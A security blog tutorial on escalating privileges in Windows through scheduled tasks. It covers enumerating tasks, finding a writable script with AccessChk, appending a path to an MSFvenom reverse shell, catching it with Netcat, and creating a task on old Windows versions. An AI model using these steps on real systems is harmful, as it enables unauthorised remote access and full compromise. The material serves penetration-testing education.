Windows Privilege Escalation – Scheduled Tasks

March 3, 2021 | by Stefano Lanaro | 2 Comments

Introduction

Windows operating systems, like most systems, have a way of scheduling the launch of programs or scripts based on certain time intervals to help automate recurring tasks. This can often become weaknesses and allow attackers to escalate privileges to root if improperly configured.

This guide will go through the main methods used to exploit scheduled tasks.

Task Scheduler

Task Scheduler is a component of Microsoft Windows that provides the ability to schedule the launch of programs or scripts at pre-defined times or after specified time intervals.

The schtasks command-line utility can be used in Windows systems to list, edit or create scheduled tasks. It can be used in the following manner to view all existing tasks:

schtasks /query /fo LIST /v

The findstr command-line utility can also be used to search or exclude certain text:

The Powershell Get-ScheduledTask utility can also be used to enumerate scheduled tasks:

Get-ScheduledTask | ft TaskName,TaskPath,State

A “where” condition can be used to exclude Windows default tasks:

Automated enumeration scripts such as WinPEAS will also enumerate scheduled tasks in a Windows system.

Unfortunately for us, Windows will only allow standard users to view scheduled tasks that belong to them, so the only way to know if a scheduled task is running scripts or commands with elevated privileges is to enumerate the files in the system.

Exploiting Scheduled Tasks

There are two main ways to exploit scheduled tasks in Windows:

Weak File Permissions used for the script being run by the scheduled tasks
Creating or modifying scheduled tasks (only works in older versions of Windows)

Exploiting Weak File Permissions

In the example below, the “Backup” scheduled task is running the Backup.ps1 Powershell script every day at 10:00am.

This image has an empty alt attribute; its file name is image-50.png

The schtasks command will display all of the properties for a given scheduled task, such as the author, the task to run, the frequency etc.

AccessChk is a command-line tool for viewing the effective permissions on files, registry keys, services, processes, kernel objects, and more. This tool will be helpful to identify whether the current user can modify the Backup.ps1 script which is run by the “Backup” scheduled task.

The tool can be downloaded from this GitHub repository.

When executing any of the sysinternals tools for the first time the user will be presented with a GUI pop-up to accept the EULA. This can be bypassed with an extra command line flag to automatically accept the EULA.

.\accesschk.exe /accepteula -quvw stef C:\Users\Administrator\Desktop\Backup.ps1

As shown above, the current user has full access to the Backup.ps1 script, meaning additional code can be added to it, which will be executed when the scheduled task runs.

For this example, a reverse shell can be generated using MSFvenom, with the following flags:

-p to specify the payload type, in this case the Windows reverse TCP shell
LHOST to specify the local host IP address to connect to
LPORT to specify the local port to connect to
-f to specify the format, in this case exe

Transferring the shell.exe file to the Windows victim machine using the Python web server and the Windows Certutil utility.

Since the current user has access to edit the Backup.ps1 script, the easiest way to exploit this is to simply add an extra line to it which will execute the reverse shell:

echo path_to_shell >> path_to_scheduled_script

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

-l to listen for incoming connections
-v for verbose output
-n to skip the DNS lookup
-p to specify the port to listen on

Once the scheduled task has run, the Powershell script was executed, connecting to the listener and therefore granting a remote shell:

Creating a New Scheduled Task

This method only works on older versions of windows (Windows 2000, XP, or 2003), furthermore the current user must be a local administrator to be able to create new scheduled tasks.

This vulnerability exists because older versions of Windows used to run every scheduled task with system-level privileges, regardless of the owner of the task.

After generating a malicious shell using MSFvenom and placing it in an arbitrary folder, in the same way as the previous exploitation process, a new scheduled task can be created with one of the following commands:

#check the system time with the "time" command
#create a scheduled task to run after a minute
at 10:00 /interactive "path_to_shell"
#or the following, in newer versions of Windoows:
SCHTASKS /CREATE /SC MINUTE /TN "Task Name" /TR "path_to_shell" /ST HH:MM

After setting up the scheduled task, a Netcat listener can be setup to catch the reverse shell and gain remote access to the target system.

The following command can be used to make sure the Task Scheduler service is running:

net start "Task Scheduler"

Conclusion

Scheduled tasks have been an exploitation vector for a very long time, as there has always been the need for automation, now more than ever.

They should be carefully configured, especially when executed as root, es they could lead to full system compromise.

2 comments


gossiping

March 31, 2022 at 12:18 am

Thank you for sharing your thoughts. I tгuly appreciatｅ your efforts
and I will be waiting for your further ᴡrіte uрs thank you once
again.
- Reply
  
  Stefano Lanaro
  
  April 10, 2022 at 8:08 am
  
  Thanks a lot for your kind words!